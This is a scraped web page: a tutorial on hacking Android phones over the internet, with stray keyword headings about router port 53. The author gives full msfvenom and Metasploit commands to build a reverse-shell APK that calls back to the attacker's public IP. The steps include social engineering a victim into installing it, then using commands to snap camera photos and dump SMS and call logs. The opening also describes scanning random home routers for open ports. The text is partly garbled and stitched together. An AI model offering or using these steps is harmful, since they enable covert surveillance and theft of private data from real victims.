Hack Router Port 53 Tcp

  1. Hack Port 53
  2. Hack Router Port 53 Tcp Login
  • Step by Step How to Randomly Hack a Home Routers. We should select an IP range. I have selected IP range that includes my public IP address. Now let's scan for home routers. When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
  • TCP/UDP port 53, showing that a DNS server is running. TCP ports 80, 443, and 8080. Sep 8, 2015 - Too many DNS servers enable bad actors to hijack them for DDoS attacks. An attacker could connect using the email server's email SMTP receiving port (TCP port 25) and send. Devices (such as wireless routers) running unexpected DNS servers. Security Data Security.

The Shodan search engine shows that 41 million devices have port 7547 open, and 5 million devices expose TR-064s services to outside influences. Indeed, these attacks started after certain researchers published computer code that exploits the TR-064 service. It’s included as a Metasploit module. The code opens up port 80, which is the port that enables web browsing.

Short Summary

In this post I’ll be showing you how to perform hack over WAN. In my previous post of computer hacking and mobile hacking, I had taught how to hack devices in a LAN. And here in this tutorial, I’m going to show you How to perform hack over WAN.

How to Perform Hack over WAN. Before reading this tutorial just go through my previous post on mobile and computer hacking.

Tcp

ALSO READ:- Hack a Windows Computer By Using a Simple Payload

To perform this hack make sure you are familiar with three topics which are listed below. You can also check out these topics through the links given below and then go ahead with this post.

  • Make sure you know How to hack a mobile and computer
  • You know about Port Forwarding
  • Difference between Public IP and Private IP addresses

Let’s Start Hacking! 😉

First of all, Create a payload. Earlier you had to type your local IP in your payload which was given by router. But in this hack, you have to type your public IP in your msfvenom. If you don’t know your public IP then just Click Here to know your public IP. Just copy and paste it in this command:

msfvenom -p android/meterpreter/reverse_tcp lhost=’public ip’ lport=’4444′ R > apkfilename.apk

So, this command will create a payload which spies over WAN.

Before sending this payload just setup your msfconsole. Type msfconsole for opening your Metasploit. then type

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost ‘local IP’ you can find this local IP address by typing ifconfig on the new window

set lport 4444

exploit

After setting up your Metasploit you have to forward the port into the router. If you don’t know How to forward a port on the router then read this article first by clicking here. Now, your all settings are done. This is the time to perform a hack by sending your payload to the victim.

After making a payload you need to send this payload to the victim’s device. There are many methods to send this payload to the victim. After generating this payload just go to a website by clicking here and then upload your payload there.

This website gives you a link for this payload. You can send this link to your victim by using Social Engineering techniques, By using social media. Whenever the victim opens your link then your payload will automatically start downloading into his/her mobile phone.

Hack

Once the victim clicks on that payload app icon you got your meterpreter session and then you can perform any command.

Hack Port 53

Here, I install this app using my mobile data. You can see my mobile data is on. I’m not using my Wi-Fi for this hack. See…I got my meterpreter session. Now, type “sysinfo” to know about the device.

Hack Router Port 53 Tcp

you can also snap a picture from victim’s device. By typing webcam_snap 1 (1 is for the Rear camera and 2 is for front camera).

Type dump_sms to dump all SMS.

Hack Router Port 53 Tcp Login

Type dump_calllog to dump all call logs.

Now type help this will show you the list of so many commands which you can perform.

  • Your security is in your hands.
  • Remember, Nobody can hack you unless you are giving permissions to them to hack yourself.
  • Don’t open these spam links.
  • Your Awareness is the only step by which you can save yourself on anywhere.

If you have any doubts and suggestion regarding this tutorial just comment it below. I will definitely reply you. Good Bye Geeks 🙂